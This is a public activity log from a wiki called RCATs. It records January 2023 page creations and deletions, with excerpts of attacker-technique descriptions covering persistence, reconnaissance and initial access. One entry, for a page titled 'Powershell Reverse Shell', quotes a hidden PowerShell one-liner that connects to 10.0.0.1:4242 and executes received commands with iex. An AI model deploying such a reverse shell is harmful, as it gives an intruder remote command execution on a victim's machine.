All public logs

Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).

Logs
  • 12:53, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Server Software Component (Mass deletion of pages added by Ali3nw3rx)
  • 12:52, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Boot or Logon Initialization Scripts (Mass deletion of pages added by Ali3nw3rx)
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:System Services (content was: "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary ex...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Inter-Process Communication (content was: "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. Adversaries may abuse IPC to ex...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:22, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Command and Scripting Interpreter (content was: "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions includ...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Trusted Relationship (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Replication Through Removable Media (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page Hardware Additions (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:17, 28 January 2023 Ali3nw3rx talk contribs deleted page External Remote Services (content was: "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.[1] Access to Valid Acc...")
  • 12:16, 28 January 2023 Ali3nw3rx talk contribs deleted page Exploit Public-Facing Application (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Drive-by Compromise (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Valid Accounts (content was: "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.[1] Compromised credentials may also...")
  • 12:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Phishing (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Supply Chain Compromise (content was: "Category:Initial Access", and the only contributor was "SourMilk" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Compromise Infrastructure (content was: "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.[1][2][3][4] Additiona...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:14, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Compromise Accounts (content was: "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Org Information (content was: "Attackers may collect information about the victim organization that can be used to identify potential targets. This information can include details about different divisions/departments, business operations, and key employees' roles and responsibilities. They may collect this information through various methods such as directly requesting it via phishing emails. The inf...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:12, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Network Information (content was: "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection acti...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Identity Information (content was: "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via Phish...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Victim Host Information (content was: "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). Adversaries may gather this information in various ways...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Victim-Owned Websites (content was: "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.[1] Adversaries may search victim-owned websites to gather actionable informati...")
  • 12:11, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Websites/Domains (content was: "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[1][2][3] Adversaries may search in diff...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Open Technical Databases (content was: "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[1][2][3][4][5][6][7] Adversa...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:10, 28 January 2023 Ali3nw3rx talk contribs deleted page Category:Search Closed Sources (content was: "Adversaries may gather information about victims from private, closed sources that can be used to identify potential targets. This information may be available for purchase from reputable sources such as paid subscriptions to feeds of technical/threat intelligence data, or from less reputable sources such as dark web or cybercrime black markets. They may search different...", and the only contributor was "Ali3nw3rx" (talk))
  • 12:00, 28 January 2023 Ali3nw3rx talk contribs created page Ping (Created page with "Category:Active Scanning ==Description== Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings...")
  • 11:33, 28 January 2023 Ali3nw3rx talk contribs created page User:Ali3nw3rx (Created page with "thumb")
  • 11:31, 28 January 2023 Ali3nw3rx talk contribs uploaded File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
  • 11:31, 28 January 2023 Ali3nw3rx talk contribs created page File:Gaming-logo-maker-featuring-robotic-animal-graphics-1028-el1 (3).png
  • 11:15, 28 January 2023 Ali3nw3rx talk contribs created page Powershell Reverse Shell (Created page with " ==Powershell Reverse Shells== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";...") Tag: Visual edit
  • 18:47, 26 January 2023 Ali3nw3rx talk contribs created page Template:Test page (Created page with "== This is our test page == == section 1 == === code we want to grab === == section 2 == === more code to grab === <syntaxhighlight> some random code </syntaxhighlight>")
  • 18:23, 26 January 2023 Ali3nw3rx talk contribs created page Test cheat sheet (Created page with "enumeration")
  • 18:00, 26 January 2023 Ali3nw3rx talk contribs created page Terminal Services DLL (Created page with "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.[1] Windows Services that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of wh...")
  • 17:59, 26 January 2023 Ali3nw3rx talk contribs created page IIS Components (Created page with "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extens...")
  • 17:55, 26 January 2023 Ali3nw3rx talk contribs created page Web Shell (Created page with "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.[1] In addition to a server-side script, a Web shell may have a client interface program that is used to...")
  • 17:54, 26 January 2023 Ali3nw3rx talk contribs created page Transport Agent (Created page with "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.[1][2] Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequ...")
  • 17:54, 26 January 2023 Ali3nw3rx talk contribs created page SQL Stored Procedures (Created page with "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a pers...")
  • 17:53, 26 January 2023 Ali3nw3rx talk contribs created page Category:Server Software Component (Created page with "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.[1] category: persistence")
  • 17:50, 26 January 2023 Ali3nw3rx talk contribs created page TFTP Boot (Created page with "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network d...")
  • 17:49, 26 January 2023 Ali3nw3rx talk contribs created page ROMMONkit (Created page with "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. [1][2] ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for exampl...")
  • 17:49, 26 January 2023 Ali3nw3rx talk contribs created page Bootkit (Created page with "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization...")
  • 17:48, 26 January 2023 Ali3nw3rx talk contribs created page Component Firmware (Created page with "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmwar...")
  • 17:48, 26 January 2023 Ali3nw3rx talk contribs created page System Firmware (Created page with "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3] System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicio...")
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Category:Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs deleted page Pre-OS Boot (content was: "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (...", and the only contributor was "Ali3nw3rx" (talk))
  • 17:47, 26 January 2023 Ali3nw3rx talk contribs created page Pre-OS Boot (Created page with "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.[1] Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems...")
  • 17:45, 26 January 2023 Ali3nw3rx talk contribs created page Add-ins (Created page with "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. [1] There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. [2][3] Ad...")
  • 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Rules (Created page with "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.[1] Once mal...")
  • 17:44, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Home Page (Created page with "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.[1] Once malicious home pages have been added to the user’s mailbox, th...")
  • 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Outlook Forms (Created page with "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.[1] Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will e...")
  • 17:43, 26 January 2023 Ali3nw3rx talk contribs created page Office Test (Created page with "Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office inst...")